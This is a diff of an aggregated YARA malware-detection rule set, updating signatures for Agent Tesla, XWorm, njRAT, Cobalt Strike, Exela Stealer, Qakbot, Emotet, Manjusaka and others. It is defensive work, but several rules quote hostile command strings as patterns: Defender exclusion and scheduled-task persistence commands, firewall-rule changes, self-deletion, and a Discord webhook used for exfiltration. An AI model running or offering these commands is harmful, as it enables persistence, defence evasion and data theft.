-		$s1 = { 8b 59 64 a1 58 00 ?? ?? 8b 8e d0 00 00 00 2b c1 2d d9 f1 3e 41 0f af da 09 46 20 a1 34 dd ?? ?? 8b d3 2b 88 a0 00 00 00 2b 0d bc ff ?? ?? 81}
-		$s2 = { 88 14 08 8b cb 8b 15 a0 6a ?? ?? 42 c1 e9 08 89 15 a0 6a ?? ?? 8b 46 20 2b 05 ec 6a ?? ?? 05 ae 49 08 00}
-		$s3 = { 03 d8 43 a1 d4 8e ?? ?? 33 18 89 1d 18 8f ?? ?? a1 d4 8e ?? ?? 8b 15 18 8f ?? ?? 89 10 8b 45 f8 83 c0 04 89 45 f8 33 c0 a3 14 8f ?? ?? a1 d4 8e ?? ?? 83 c0 04 03 05 14 8f ?? ?? a3 d4 8e ?? ?? 8b 45 f8 3b 05 e0 8e ?? ?? }
+		$s1 = {03 1F 72 2E ?? 03 1F 73 2E ?? 03 1F 74 2E ?? 03 1F 75 2E ?? 03 1F 76 2E ?? }
+		$s2 = {0B 14 0C 16 0D 16 13 ?? 16 13 ?? 14}
 
 	condition:
-		$s1 or $s2 or $s3
+		dotnet.is_dotnet and ( all of ( $s* ) )
+}
+
+rule EMBEERESEARCH_Win_Agent_Tesla_Bytecodes_Sep_2023
+{
+	meta:
+		description = "No description has been set in the source file - EmbeeResearch"
+		author = "Matthew @embee_research"
+		id = "9d1c5010-7c64-5a6a-bf60-35c042732761"
+		date = "2023-09-21"
+		modified = "2023-09-21"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_agent_tesla_bytecodes_sep_2023.yar#L4-L21"
+		license_url = "N/A"
+		hash = "ce696cf7a6111f5e7c6781854de04ddc262b6c9b39c059fd5435dfb3b8901f04"
+		hash = "afc29232c4989587db2c54b7c9f145fd0d73537e045ece15338582ede5389fce"
+		hash = "fba4374163ba25c9dc572f1a5d7f3e46e09531ab964d808f3dde2a19c05a2ee5"
+		logic_hash = "1cc40ab16dfa5245b3146e4512509037f540d59e155040a2336a97cd0f42e612"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$s1 = {8F ?? ?? ?? ?? 25 47 FE ?? ?? ?? FE ?? ?? ?? 91 61 D2 52 20 ?? ?? ?? ?? FE ?? ?? ?? }
+
+	condition:
+		dotnet.is_dotnet and $s1
+}
+
+rule EMBEERESEARCH_Win_Xworm_Simple_Strings
+{
+	meta:
+		description = "Detects simple strings present in unobfuscated xworm"
+		author = "Matthew @ Embee_Research"
+		id = "8d5d8f07-72fa-596b-a3fc-1dee4b7fd058"
+		date = "2023-08-30"
+		modified = "2023-10-18"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_xworm_simple_strings_sep_2023.yar#L3-L29"
+		license_url = "N/A"
+		hash = "4459d95c0493d640ecc9453cf6a4f2b7538b1a7b95032f70803fc726b8e40422"
+		hash = "820bb1a31f421b90ea51efc3e71cc720c8c2784fb1e882e732e8fafb8631a389"
+		logic_hash = "f7df310b24b2078249cdb670ece71ebe30f985c92b3e44b6dcf0e37405a26bc3"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$x1 = "XWorm V" wide nocase
+		$s1 = "/create /f /RL HIGHEST /sc minute /mo 1 /tn " wide
+		$s2 = "/create /f /sc minute /mo 1 /tn " wide
+		$s3 = "-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath " wide
+
+	condition:
+		dotnet.is_dotnet and $x1 and ( 2 of ( $s* ) )
+}
+
+rule EMBEERESEARCH_Win_Njrat_Strings_Oct_2023
+{
+	meta:
+		description = ""
+		author = "Matthew @ Embee_Research"
+		id = "c89711cb-aae9-5409-80c2-145a8d5fca56"
+		date = "2023-10-03"
+		modified = "2023-10-03"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_strings_oct_2023.yar#L3-L25"
+		license_url = "N/A"
+		hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474"
+		logic_hash = "ed36a991aa2699486f1ef34f4f4d559a3dd351180602f017ad7d868e146c703b"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$s1 = "netsh firewall delete allowedprogram" wide
+		$s2 = "cmd.exe /c ping 0 -n 2 & del" wide
+		$s3 = "netsh firewall add allowedprogram" wide
+		$s4 = "Execute ERROR" wide
+		$s5 = "Update ERROR" wide
+		$s6 = "Download ERROR" wide
+
+	condition:
+		dotnet.is_dotnet and ( all of ( $s* ) )
+}
+rule EMBEERESEARCH_Win_Cobalt_Strike_Loader_Shellcode_Jun_2023 : FILE
+{
+	meta:
+		description = "Detection of an encoder observed with Cobalt Strike shellcode"
+		author = "Matthew @ Embee_research"
+		id = "ea52b9e7-f2bd-5c9f-9ee1-506baa48be84"
+		date = "2023-07-03"
+		modified = "2023-07-03"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_shellcode_encoder_jun_2023.yar#L1-L21"
+		license_url = "N/A"
+		logic_hash = "42b4b9ab681f3164168de84e76bcd8161865fa9e5871d70a6de534b23896e4f0"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		vendor = ""
+
+	strings:
+		$get_enc_offset = {8b 88 c0 00 00 00 8b 90 c4 00 00 00 48 8d b0 c8 00 00 00}
+		$decode_loop = {ac 83 e1 03 d2 c8 ff c1 aa ff ca 75 f3}
+		$b64_initial_bytes = "SInISIlMJAiLiMAAAACLkMQAAABIjbDIAAAA" wide ascii
+
+	condition:
+		(( $get_enc_offset and $decode_loop ) or $b64_initial_bytes ) and filesize < 10000KB
+}
+
+rule EMBEERESEARCH_Win_Exela_Stealer_Simple_Strings_Sep_2023
+{
+	meta:
+		description = "No description has been set in the source file - EmbeeResearch"
+		author = "Matthew @embee_research"
+		id = "e63aa1d3-997e-5200-93fc-869c177fe1a8"
+		date = "2023-09-24"
+		modified = "2023-09-26"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_exela_stealer_simple_strings_sep_2023.yar#L4-L32"
+		license_url = "N/A"
+		hash = "bf5d70ca2faf355d86f4b40b58032f21e99c3944b1c5e199b9bb728258a95c1b"
+		logic_hash = "2312b63fe86fd34eb12f42f079f470eb3af27ef8c199f3620253c828ad28441a"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$s1 = "https://i.instagram.com/api/v1/accounts/current_user/" wide
+		$s2 = "/create /f /sc onlogon /rl highest /tn \"AutoUpdateCheckerOnLogon\" /tr " wide
+		$s4 = "https://discord.com/api/webhooks/" wide
+		$s5 = "Browser : {0} | Name : {1} | Value : {2} | Date created (timestamp) : {3} |  Date last used (timestamp) : {4} | Count {5}" wide
+		$s6 = "Browser : {0} | {1} {2}/{3} {4}" wide
+		$e1 = "Exela.Program" wide ascii
+		$e2 = "Exela.Wifi" wide ascii
+		$e3 = "Exela.Components" wide ascii
+		$e4 = "Exela Stealer" wide ascii
+		$e5 = "Exela.exe" wide ascii
+
+	condition:
+		dotnet.is_dotnet and ( ( all of ( $s* ) ) or ( 3 of ( $e* ) ) )
+}
+rule EMBEERESEARCH_Win_Medusa_Bytecodes
+{
+	meta:
+		description = "Medusa Bytecodes"
+		author = "Matthew @ Embee_Research"
+		id = "48b659f8-cd26-540a-89b6-6349f8d21e8f"
+		date = "2023-08-27"
+		modified = "2024-03-03"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_medusa_dotnet_bytecodes.yar#L1-L17"
+		license_url = "N/A"
+		hash = "a1211549b4e1a7befd953d03b4d929b3dc9f25ec6c1bc9c05ae92a0ec08fb77c"
+		logic_hash = "aa01afd6981af99625a9fca93e512cc00931aca18e55c5cb6dee11efb9ea2968"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$s1 = {1F ?? 8D ?? ?? ?? 01 25 16 72 ?? ?? ?? 70 A2 25 17 72 ?? ?? ?? 70 28 ?? ?? ?? 0A A2 25 18 20 ?? ?? ?? 00 13 04 12 04 28 ?? ?? ?? 0A A2 25 19 20 ?? ?? ?? 00 13 ?? 12 }
+		$s2 = "\\Medusa\\obj\\Release\\Medusa.pdb" ascii
+
+	condition:
+		$s1 or $s2
 }
 rule EMBEERESEARCH_Win_Remcos_Rat_Unpacked : FILE
 {
@@ -163705,31 +164295,73 @@ rule EMBEERESEARCH_Win_Remcos_Rat_Unpacked : FILE
 	condition:
 		(( all of ( $r* ) ) or ( all of ( $s* ) ) )
 }
-rule EMBEERESEARCH_Win_Bruteratel_Syscall_Hashes_Oct_2022 : FILE
+rule EMBEERESEARCH_Win_Havoc_Djb2_Hashing_Routine_Oct_2022 : FILE
 {
 	meta:
-		description = "Detection of Brute Ratel Badger via api hashes of Nt* functions. "
+		description = "No description has been set in the source file - EmbeeResearch"
+		author = "embee_research @ HuntressLabs"
+		id = "cde3e14f-0671-5bcf-93e8-e0a0af9b462c"
+		date = "2022-10-11"
+		modified = "2023-10-18"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_havoc_djb2_hashing_routine_oct_2022.yar#L1-L24"
+		license_url = "N/A"
+		logic_hash = "9f645480c3d78153186a247440739a1d2e627ec64a4225083bd8db4ad9bd5ef3"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		vendor = "Huntress Research"
+
+	strings:
+		$dll = {b8 05 15 00 00 0f be 11 48 ff c1 84 d2 74 07 6b c0 21 01 d0 eb ef}
+		$shellcode = {41 80 f8 60 76 04 41 83 e8 20 6b c0 21 45 0f b6 c0 49 ff c1 44 01 c0 eb c4}
+
+	condition:
+		( any of them ) and ( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x00e8 or uint16( 0 ) == 0x4856 )
+}
+rule EMBEERESEARCH_Win_Qakbot_String_Decrypt_Nov_2022 : FILE
+{
+	meta:
+		description = "No description has been set in the source file - EmbeeResearch"
 		author = "Embee_Research @ Huntress"
-		id = "b82612b4-272e-5ae2-bd87-3593e55918f8"
-		date = "2022-10-12"
+		id = "0023872f-8edb-59d6-88eb-a76528ba6ec8"
+		date = "2022-11-14"
 		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_bruteratel_syscall_hashes_oct_2022.yar#L1-L23"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_qakbot_string_decrypt_nov_2022.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "e284d5568e0b5ffa0f231f98ecce13b5f5518a4e005ea001a5c89087c91eb8a1"
-		score = 60
-		quality = 25
+		logic_hash = "d225f69fa4dd0e8d7c98e7f8968ad285f05b232225e9ce1070b7a23257a0ef9d"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		vendor = "Huntress"
 
 	strings:
-		$hash1 = {89 4d 39 8c}
-		$hash2 = {bd ca 3b d3}
-		$hash3 = {b2 c1 06 ae}
-		$hash4 = {74 eb 1d 4d}
+		$qakbot_decrypt = {33 d2 8b c7 f7 75 10 8a 04 1a 8b 55 fc 32 04 17 88 04 39 47 83 ee 01}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x00e8 ) and ( 2 of ( $hash* ) )
+		uint16( 0 ) == 0x5a4d and $qakbot_decrypt
+}
+rule EMBEERESEARCH_Win_Icedid_Encryption_Oct_2022 : FILE
+{
+	meta:
+		description = "No description has been set in the source file - EmbeeResearch"
+		author = "Embee_Research @ Huntress"
+		id = "1ecbb3b3-dfc1-5d69-807d-3a44c39a3536"
+		date = "2022-10-14"
+		modified = "2023-10-18"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_icedid_encryption_oct_2022.yar#L1-L18"
+		license_url = "N/A"
+		logic_hash = "da657cf87e043a1fdb2ec683de8a7a12acb8c8f1c24034bb376d525c0a1c5740"
+		score = 75
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$IcedID = {41 0f b6 d3 44 8d 42 01 83 e2 03 41 83 e0 03 42 8a 44 84 40 02 44 94 40 43 32 04 33 42 8b 4c 84 40 41 88 04 1b 83 e1 07 8b 44 94 40 49 ff c3 d3 c8 ff c0 89 44 94 40 83 e0 07}
+
+	condition:
+		$IcedID
 }
 rule EMBEERESEARCH_Win_Gracewire_Loader_Dec_2022 : FILE
 {
@@ -163756,6 +164388,31 @@ rule EMBEERESEARCH_Win_Gracewire_Loader_Dec_2022 : FILE
 	condition:
 		3 of them
 }
+rule EMBEERESEARCH_Win_Emotet_String_Patterns_Oct_2022 : FILE
+{
+	meta:
+		description = "Detection of string hashing routines observed in emotet"
+		author = "Embee_Research @ HuntressLabs"
+		id = "fd9c3133-95dc-5dd8-9e94-ed85ad8e1fc7"
+		date = "2022-10-14"
+		modified = "2023-10-18"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_emotet_string_patterns_oct_2022.yar#L1-L19"
+		license_url = "N/A"
+		logic_hash = "36f4a3fed124b8c25711f706c5b4f1c9b0801c2105cf86077b8c002dd70a6fbc"
+		score = 75
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$em1 = {45 33 f6 4c 8b d0 48 85 c0 74 64 48 8d 14 b3 4c 8b c0 45 8b de 4c 8b ca 4c 2b cb 49 83 c1 03 49 c1 e9 02 48 3b da 4d 0f 47 ce}
+		$em2 = {8b cd 49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00 0f b7 c1 c1 e9 10 66 c1 e8 08 4d 8d 40 08 66 41 89 40 fa 0f b6 c1 66 c1 e9 08 66 41 89 40 fc 66 41 89 48 fe 4d 3b d9}
+		$em3 = {49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00}
+		$em4 = {8b cb 41 8b d0 d3 e2 41 8b cb d3 e0 03 d0 41 0f be c1 03 d0 41 2b d0 49 ff c2 44 8b c2}
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( any of them )
+}
 rule EMBEERESEARCH_Win_Nighthawk_Nov_2022 : FILE
 {
 	meta:
@@ -163807,28 +164464,6 @@ rule EMBEERESEARCH_Win_Nighthawk_Nov_2022 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( ( ( ( 3 of ( $s* ) ) or ( 3 of ( $g* ) ) ) and ( ( 1 of ( $ror* ) ) and ( 1 of ( $gs_offset* ) ) ) ) or $shr_block )
 }
-rule EMBEERESEARCH_Win_Qakbot_String_Decrypt_Nov_2022 : FILE
-{
-	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
-		author = "Embee_Research @ Huntress"
-		id = "0023872f-8edb-59d6-88eb-a76528ba6ec8"
-		date = "2022-11-14"
-		modified = "2023-10-18"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_qakbot_string_decrypt_nov_2022.yar#L1-L15"
-		license_url = "N/A"
-		logic_hash = "d225f69fa4dd0e8d7c98e7f8968ad285f05b232225e9ce1070b7a23257a0ef9d"
-		score = 75
-		quality = 75
-		tags = "FILE"
-
-	strings:
-		$qakbot_decrypt = {33 d2 8b c7 f7 75 10 8a 04 1a 8b 55 fc 32 04 17 88 04 39 47 83 ee 01}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and $qakbot_decrypt
-}
 rule EMBEERESEARCH_Win_Qakbot_Api_Hashing_Oct_2022 : FILE
 {
 	meta:
@@ -163852,82 +164487,37 @@ rule EMBEERESEARCH_Win_Qakbot_Api_Hashing_Oct_2022 : FILE
 	condition:
 		any of them
 }
-rule EMBEERESEARCH_Win_Icedid_Encryption_Oct_2022 : FILE
+rule EMBEERESEARCH_Win_Bruteratel_Syscall_Hashes_Oct_2022 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
+		description = "Detection of Brute Ratel Badger via api hashes of Nt* functions. "
 		author = "Embee_Research @ Huntress"
-		id = "1ecbb3b3-dfc1-5d69-807d-3a44c39a3536"
-		date = "2022-10-14"
-		modified = "2023-10-18"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_icedid_encryption_oct_2022.yar#L1-L18"
-		license_url = "N/A"
-		logic_hash = "da657cf87e043a1fdb2ec683de8a7a12acb8c8f1c24034bb376d525c0a1c5740"
-		score = 75
-		quality = 75
-		tags = "FILE"
-
-	strings:
-		$IcedID = {41 0f b6 d3 44 8d 42 01 83 e2 03 41 83 e0 03 42 8a 44 84 40 02 44 94 40 43 32 04 33 42 8b 4c 84 40 41 88 04 1b 83 e1 07 8b 44 94 40 49 ff c3 d3 c8 ff c0 89 44 94 40 83 e0 07}
-
-	condition:
-		$IcedID
-}
-rule EMBEERESEARCH_Win_Emotet_String_Patterns_Oct_2022 : FILE
-{
-	meta:
-		description = "Detection of string hashing routines observed in emotet"
-		author = "Embee_Research @ HuntressLabs"
-		id = "fd9c3133-95dc-5dd8-9e94-ed85ad8e1fc7"
-		date = "2022-10-14"
-		modified = "2023-10-18"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_emotet_string_patterns_oct_2022.yar#L1-L19"
-		license_url = "N/A"
-		logic_hash = "36f4a3fed124b8c25711f706c5b4f1c9b0801c2105cf86077b8c002dd70a6fbc"
-		score = 75
-		quality = 75
-		tags = "FILE"
-
-	strings:
-		$em1 = {45 33 f6 4c 8b d0 48 85 c0 74 64 48 8d 14 b3 4c 8b c0 45 8b de 4c 8b ca 4c 2b cb 49 83 c1 03 49 c1 e9 02 48 3b da 4d 0f 47 ce}
-		$em2 = {8b cd 49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00 0f b7 c1 c1 e9 10 66 c1 e8 08 4d 8d 40 08 66 41 89 40 fa 0f b6 c1 66 c1 e9 08 66 41 89 40 fc 66 41 89 48 fe 4d 3b d9}
-		$em3 = {49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00}
-		$em4 = {8b cb 41 8b d0 d3 e2 41 8b cb d3 e0 03 d0 41 0f be c1 03 d0 41 2b d0 49 ff c2 44 8b c2}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( any of them )
-}
-rule EMBEERESEARCH_Win_Havoc_Djb2_Hashing_Routine_Oct_2022 : FILE
-{
-	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
-		author = "embee_research @ HuntressLabs"
-		id = "cde3e14f-0671-5bcf-93e8-e0a0af9b462c"
-		date = "2022-10-11"
+		id = "b82612b4-272e-5ae2-bd87-3593e55918f8"
+		date = "2022-10-12"
 		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_havoc_djb2_hashing_routine_oct_2022.yar#L1-L24"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_bruteratel_syscall_hashes_oct_2022.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "9f645480c3d78153186a247440739a1d2e627ec64a4225083bd8db4ad9bd5ef3"
-		score = 75
-		quality = 75
+		logic_hash = "e284d5568e0b5ffa0f231f98ecce13b5f5518a4e005ea001a5c89087c91eb8a1"
+		score = 60
+		quality = 25
 		tags = "FILE"
-		vendor = "Huntress Research"
+		vendor = "Huntress"
 
 	strings:
-		$dll = {b8 05 15 00 00 0f be 11 48 ff c1 84 d2 74 07 6b c0 21 01 d0 eb ef}
-		$shellcode = {41 80 f8 60 76 04 41 83 e8 20 6b c0 21 45 0f b6 c0 49 ff c1 44 01 c0 eb c4}
+		$hash1 = {89 4d 39 8c}
+		$hash2 = {bd ca 3b d3}
+		$hash3 = {b2 c1 06 ae}
+		$hash4 = {74 eb 1d 4d}
 
 	condition:
-		( any of them ) and ( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x00e8 or uint16( 0 ) == 0x4856 )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x00e8 ) and ( 2 of ( $hash* ) )
 }
 /*
  * YARA Rule Set
  * Repository Name: AvastTI
  * Repository: https://github.com/avast/ioc
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 5659f4f0f4e09970c5de29c536ceb500d5634951
  * Number of Rules: 33
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -163978,165 +164568,6 @@ private rule AVASTTI_ELF_PRIVATE
 	condition:
 		$h01 at 0
 }
-rule AVASTTI_Manjusaka_Framework_Go_Build_Id
-{
-	meta:
-		description = "No description has been set in the source file - AvastTI"
-		author = "Avast Threat Intel Team"
-		id = "eca3324c-c029-53b5-b33d-9ec758dcd863"
-		date = "2022-10-05"
-		modified = "2022-10-05"
-		reference = "https://github.com/avast/ioc"
-		source_url = "https://github.com/avast/ioc/blob/5659f4f0f4e09970c5de29c536ceb500d5634951/Manjusaka/Manjusaka.yar#L15-L62"
-		license_url = "N/A"
-		hash = "955e9bbcdf1cb230c5f079a08995f510a3b96224545e04c1b1f9889d57dd33c1"
-		hash = "f275ca5129399a521c8cd9754b1133ecd2debcfafc928c01df6bd438522c564a"
-		hash = "637f3080526d7d0ad5eb41bf9331fb51aaafd30f2895c00a44ad905154f76d70"
-		hash = "b5c366d782426bad4ba880dc908669ff785420dea02067b12e2261dd1988f34a"
-		hash = "107b094031094cbb1f081d85ec2799c3450dce32e254bda2fd1bb32edb449aa4"
-		hash = "fb5835f42d5611804aaa044150a20b13dcf595d91314ebef8cf6810407d85c64"
-		hash = "ff20333d38f7affbfde5b85d704ee20cd60b519cb57c70e0cf5ac1f65acf91a6"
-		hash = "3581d99feb874f65f53866751b7874c106b5ce65a523972ef6a736844209043c"
-		hash = "6082bf26bcc07bf299a88eaa0272022418b12156cd987adfdff9fa1517afcf3d"
-		hash = "14dfb43a1782b0b8d93c3d67d63b6c786b0a223bc50c3ec68106bd18d43652a4"
-		hash = "4a0f47132867c12a6d009e43812729a1bb41f4eb83472ac352fc5b20fe937bef"
-		hash = "bb1b7d506559c783ed747da461f58ea5256ba0a083768ae6aa1a2325017c4387"
-		hash = "bd0e09e9ee4db74ada6433f00024a543f799046c15f635216ca4ae5e1f0c42e2"
-		logic_hash = "de68bc483255c9c1095771925a7c2fc3062489a4468d42e7c6aa9f0146841c5c"
-		score = 75
-		quality = 88
-		tags = ""
-
-	strings:
-		$h01 = { 47 6F 00 00 57 79 5F 76 69 62 44 5A 76 32 77 6D 35 62 4C 32 71 73 6A 4A 2F 34 50 4D 56 79 4D 39 39 76 61 76 58 68 7A 65 5A 34 6C 76 2D 2F 4E 59 6C 5F 4B 6D 75 53 45 62 53 4E 4A 6B 39 45 61 52 74 31 2F 2D 45 4D 50 57 64 6A 73 30 4E 6C 37 73 79 67 41 41 74 65 54 00 }
-		$h02 = { 47 6F 00 00 79 30 4D 57 35 6A 74 30 45 6B 61 77 55 4B 35 6B 6B 6C 31 32 2F 5A 68 34 34 36 61 65 4D 7A 62 48 47 37 4F 73 56 4F 66 71 75 2F 6D 5F 58 74 43 52 32 32 39 75 4B 67 5A 62 51 65 44 35 43 74 2F 66 78 66 47 4A 47 61 59 4E 31 5F 36 6E 4E 76 32 58 5A 53 62 00 }
-		$h03 = { 47 6F 06 FF FF FF 7F 79 30 4D 57 35 6A 74 30 45 6B 61 77 55 4B 35 6B 6B 6C 31 32 2F 5A 68 34 34 36 61 65 4D 7A 62 FF FF FF FF 48 47 37 4F 73 56 4F 66 71 75 2F 6D 5F 58 74 43 52 32 32 39 75 4B 67 5A 62 51 65 44 35 43 74 2F }
-		$h04 = { 47 6F 00 00 30 33 30 36 42 53 4B 42 71 6E 71 4B 74 4D 51 71 67 53 58 4D 2F 68 4C 6A 34 77 76 56 56 4A 4C 79 42 43 61 4A 42 5F 38 4D 30 2F 73 74 66 62 47 73 46 5A 58 67 4E 6B 50 77 5A 4B 4C 71 52 65 2F 4D 49 46 68 69 67 7A 65 50 53 65 56 35 64 5F 52 6D 66 43 35 00 }
-		$h05 = { 47 6F 06 FF FF FF 7F 30 33 30 36 42 53 4B 42 71 6E 71 4B 74 4D 51 71 67 53 58 4D 2F 68 4C 6A 34 77 76 56 56 4A 4C FF FF FF FF 79 42 43 61 4A 42 5F 38 4D 30 2F 73 74 66 62 47 73 46 5A 58 67 4E 6B 50 77 5A 4B 4C 71 52 65 }
-		$h06 = { 47 6F 00 00 36 35 34 67 69 6A 50 41 55 6B 45 61 7A 4A 70 6A 44 39 4E 55 2F 67 44 75 48 46 31 78 66 64 70 39 31 53 66 36 53 59 51 48 58 2F 76 73 6E 6E 37 65 6B 67 30 54 4B 58 57 69 4F 53 63 46 30 44 2F 53 61 6D 30 73 51 6D 66 79 43 61 44 43 38 71 43 66 59 78 35 00 }
-		$h07 = { 47 6F 06 FF ED FF 7F 36 35 34 67 69 6A 50 41 55 6B 45 61 7A 4A 70 6A 44 39 68 2F 67 44 75 48 46 31 78 66 FF FF FF FF 64 70 39 31 53 66 36 53 59 51 48 58 2F 76 73 6E 6E 37 65 6B 67 30 54 4B 58 57 69 4F 53 63 46 30 }
-		$h08 = { 47 6F 20 62 FF FF FF FF 75 69 6C 64 20 49 44 3A 20 22 65 72 52 47 4F 4A 56 48 65 38 37 58 67 6D 79 4F 56 77 48 44 2F 42 FB FF FF FF 70 78 56 76 70 79 44 58 74 4C 64 64 79 57 46 64 38 4E 39 2F 6F 59 77 64 70 73 6D 46 45 }
-		$h09 = { 47 6F 20 62 75 69 6C 64 20 49 44 3A 20 22 65 72 52 47 4F 4A 56 48 65 38 37 58 67 6D 79 4F 56 77 48 44 2F 42 70 78 56 76 70 79 44 58 74 4C 64 64 79 57 46 64 38 4E 39 2F 6F 59 77 64 70 73 6D 46 45 44 58 39 32 58 4A 55 52 4C 55 7A 2F 62 62 58 59 38 43 76 6B 44 4D 72 69 42 33 32 64 49 36 53 58 }
-		$h10 = { 47 6F 00 00 47 6E 42 4B 6F 63 4C 77 76 57 5A 6E 43 5F 55 6D 49 72 2D 72 2F 36 50 2D 4F 7A 46 62 51 37 39 6F 59 79 79 61 44 52 48 56 34 2F 38 74 6D 46 77 78 63 53 64 63 63 6D 70 66 73 5A 63 33 68 62 2F 77 34 2D 36 49 52 50 70 75 42 66 75 61 68 7A 50 63 4C 35 32 00 }
-		$h11 = { 47 6F 06 FF FF FF FF 6E 42 4B 6F 63 4C 77 76 57 5A 6E 43 5F 55 6D 49 72 2D 72 2F 36 50 2D 4F 7A 46 62 51 37 39 6F FF FF 6F FF 59 79 79 61 44 52 48 56 DC 38 74 6D 46 77 78 63 53 64 63 63 6D 70 66 73 5A 63 33 68 62 }
-		$h12 = { 47 6F 00 00 4E 50 57 41 64 50 62 57 6D 6E 58 72 30 61 36 67 44 37 4B 7A 2F 54 74 6E 59 64 4F 79 43 6A 76 63 43 51 75 5A 39 47 69 44 72 2F 46 43 6D 4F 69 38 41 30 36 36 52 50 43 36 53 4F 57 76 61 4D 2F 43 70 57 37 4F 30 73 38 61 51 32 42 46 56 64 66 65 62 54 4A 00 }
-		$h13 = { 47 6F 06 FF FF FF 7F 4E 50 57 41 64 50 62 57 6D 6E 58 72 30 61 36 67 44 37 4B 7A 2F 54 74 6E 59 64 4F 79 43 6A 76 FF FF FF FF 63 43 51 75 5A 39 47 69 44 72 2F 46 43 6D 4F 69 38 41 30 36 36 52 50 43 36 53 4F 57 76 61 4D 2F }
-
-	condition:
-		any of them
-}
-rule AVASTTI_Manjusaka_Payload_Encoded_Hexstring
-{
-	meta:
-		description = "No description has been set in the source file - AvastTI"
-		author = "Avast Threat Intel Team"
-		id = "9799081c-67ec-5ab8-9b23-31f60c05fc05"
-		date = "2022-10-05"
-		modified = "2022-10-05"
-		reference = "https://github.com/avast/ioc"
-		source_url = "https://github.com/avast/ioc/blob/5659f4f0f4e09970c5de29c536ceb500d5634951/Manjusaka/Manjusaka.yar#L64-L93"
-		license_url = "N/A"
-		logic_hash = "5c0b83e709baea7db6185d888bfa10bab073eb0eb2f3fb72df2da76fff3f6f22"
-		score = 75
-		quality = 90
-		tags = ""
-
